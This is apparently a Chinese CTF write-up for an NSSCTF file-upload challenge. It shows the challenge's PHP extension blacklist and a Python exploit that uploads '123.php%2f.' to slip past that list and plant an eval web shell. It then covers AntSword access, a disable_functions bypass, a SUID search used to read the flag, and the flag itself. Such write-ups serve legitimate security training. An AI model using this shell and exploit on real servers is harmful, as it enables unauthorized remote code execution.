题目源代码
<?php
function blacklist($file){
$deny_ext = array("php","php5","php4","php3","php2","php1","html","htm","phtml","pht","pHp","pHp5","pHp4","pHp3","pHp2","pHp1","Html","Htm","pHtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","aSp","aSpx","aSa","aSax","aScx","aShx","aSmx","cEr","sWf","swf","ini");
$ext = pathinfo($file, PATHINFO_EXTENSION);
foreach ($deny_ext as $value) {
if (stristr($ext, $value)){
return false;
}
}
return true;
}
if(isset($_FILES['file'])){
$filename = urldecode($_FILES['file']['name']);
$filecontent = file_get_contents($_FILES['file']['tmp_name']);
if(blacklist($filename)){
file_put_contents($filename, $filecontent);
echo "Success!!!";
} else {
echo "Hacker!!!";
}
} else{
highlight_file(__FILE__);
}
file_put_content函数有一个文件解析的漏洞
当上传123.php/.的时候,file_put_contents函数会认为是要在123.php文件所在的目录下创建一个名为.的文件,最终上传创建的是123.php
新建1.php,内容如下,和exp放同一个目录下
<?php eval($_POST[0]);phpinfo();?>
#这里的0是蚁剑的连接密码
exp上马
import requests
url = "http://node6.anna.nssctf.cn:23009/" # 目标URL(这里填你题目的URL)
file = {
"file": ("123.php%2f.", open('1.php', 'rb')) # 文件名和打开的文件
}
try:
res = requests.post(url=url, files=file) # 发送POST请求
print(res.text) # 打印服务器响应
except Exception as e:
print("发生错误:", e)
访问123.php成功
http://node6.anna.nssctf.cn:23009/123.php
#靶场URL/123.php
蚁剑连接
蚁剑连接进去以后
我们看到flag大小45b,是有内容的,但是无法查看,权限是0740
权限 0740 表示文件所有者可以读、写和执行该文件,所属组用户只能读取该文件,而其他用户没有任何权限。
想改一下权限 发现失败了
终端试一下呢
可以发现无法执行命令
查看phpinfo信息,发现命令执行函数被禁用了
这里利用蚁剑的插件【绕过Disable Functions】来绕过,如果没有该插件的话记得蚁剑挂上代理到蚁剑插件市场下载该插件
现在就可以执行命令了
本来想着suid提权,直接给flag路径访问即可
find / -perm -u=s -type f 2>/dev/null
/usr/local/s3cRetTt
flag:
NSSCTF{6daca001-e299-41b9-b407-1c6034ead189}